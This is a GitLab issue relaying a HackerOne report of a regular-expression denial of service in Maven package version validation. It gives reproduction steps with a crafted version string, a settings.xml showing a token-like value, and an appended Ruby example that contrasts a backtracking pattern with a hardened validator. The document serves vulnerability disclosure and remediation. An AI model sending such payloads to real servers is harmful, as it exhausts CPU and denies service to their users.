  • #263116
Closed (duplicated) (duplicated)
Open
Issue created Oct 07, 2020 by GitLab SecurityBot@gitlab-securitybotReporter

Maven package version ReDoS

HackerOne report #997961 by anyday on 2020-10-05, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

Report

Hello,

Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking: aaaa....! (!32925 (merged))

Steps to reproduce:

Follow Maven guide https://docs.gitlab.com/ee/user/packages/maven_repository/

  • generate project
    mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

  • create settings.xml with your access token (e.g. at /root/.m2/settings.xml)

<settings>
  <servers>
    <server>
      <id>gitlab-maven</id>
      <configuration>
        <httpHeaders>
          <property>
            <name>Private-Token</name>
            <value>srzc2-M3ysZx-ZEKQRki</value>
          </property>
        </httpHeaders>
      </configuration>
    </server>
  </servers>
</settings>

Edit pom.xml with

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.mycompany.mydepartment</groupId>
  <artifactId>my-project</artifactId>
  <packaging>jar</packaging>

  <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->

  <name>my-project</name>
  <url>http://maven.apache.org</url>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>

  <properties><!-- Maven was complaining about something -->
    <maven.compiler.source>6</maven.compiler.source>
    <maven.compiler.target>6</maven.compiler.target>
  </properties>

  <repositories><!-- replace(3) 'gitlab.com' and 'PROJECT_ID' (a "--" run inside an XML comment is invalid, so the long dash rule was shortened) -->
    <repository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/packages/maven</url>
    </repository>
  </repositories>

  <distributionManagement>
    <repository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
    </repository>
    <snapshotRepository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
    </snapshotRepository>
  </distributionManagement>
</project>
  • mvn deploy

Video:
mvn_redos.mp4

Impact

Denial of service, CPU exhaustion

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • mvn_redos.mp4

How To Reproduce

Please add reproducibility information to this section:
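The report gives the reproduction but not the pattern that backtracks. As an added example (not the reporter's code and not GitLab's validation regex), the Ruby below contrasts a constructed nested-quantifier version pattern, which on a backtracking engine without memoization does exponential work on an `aaaa...!/x` input of the shape in the report, with a length-capped, linear validator; `BACKTRACKING_VERSION`, `SAFE_VERSION`, `MAX_VERSION_LENGTH`, `valid_maven_version?` and `REDOS_PROBE` are assumed names.

```ruby
# Added example; not code from the report or from GitLab.
# Both patterns are constructed for illustration and are NOT GitLab's
# actual Maven version-validation regex.

# Anti-pattern: a quantified group wrapping another quantified group over
# the same character class. When the input is a long run of valid
# characters followed by one the pattern cannot accept, a backtracking
# engine without memoization (Ruby < 3.2, many others) tries every way
# of splitting the run, i.e. exponential work: the ReDoS shape reported.
BACKTRACKING_VERSION = /\A([a-zA-Z0-9]+(\.[a-zA-Z0-9]*)*)+\z/

# Hardened form: bound the length before matching, then use an anchored
# pattern with no nested quantifiers, so matching is linear in the input.
MAX_VERSION_LENGTH = 255  # assumed cap for the example
SAFE_VERSION = /\A[a-zA-Z0-9]+(?:[.\-][a-zA-Z0-9]+)*\z/

def valid_maven_version?(version)
  return false unless version.is_a?(String)
  return false if version.empty? || version.length > MAX_VERSION_LENGTH
  SAFE_VERSION.match?(version)
end

# Returns [matched?, elapsed_seconds] for one match attempt; used only to
# show the cost difference between the two patterns on the same input.
def time_match(pattern, input)
  t0 = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  matched = pattern.match?(input)
  [matched, Process.clock_gettime(Process::CLOCK_MONOTONIC) - t0]
end

# Constructed probe input of the shape in the report: a run of 'a'
# followed by characters the pattern rejects (kept short on purpose).
REDOS_PROBE = ('a' * 24) + '!/x'

if __FILE__ == $PROGRAM_NAME
  # Defence in depth on Ruby >= 3.2: a global match timeout turns a
  # runaway match into Regexp::TimeoutError instead of a hung worker.
  Regexp.timeout = 1.0 if Regexp.respond_to?(:timeout=)
  begin
    matched, secs = time_match(BACKTRACKING_VERSION, REDOS_PROBE)
    puts format('backtracking pattern: matched=%s in %.4fs', matched, secs)
  rescue StandardError => e
    puts "backtracking pattern: aborted (#{e.class})"
  end
  matched, secs = time_match(SAFE_VERSION, REDOS_PROBE)
  puts format('hardened validator:   matched=%s in %.6fs', matched, secs)
  puts "1.0-SNAPSHOT valid? #{valid_maven_version?('1.0-SNAPSHOT')}"
end
```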
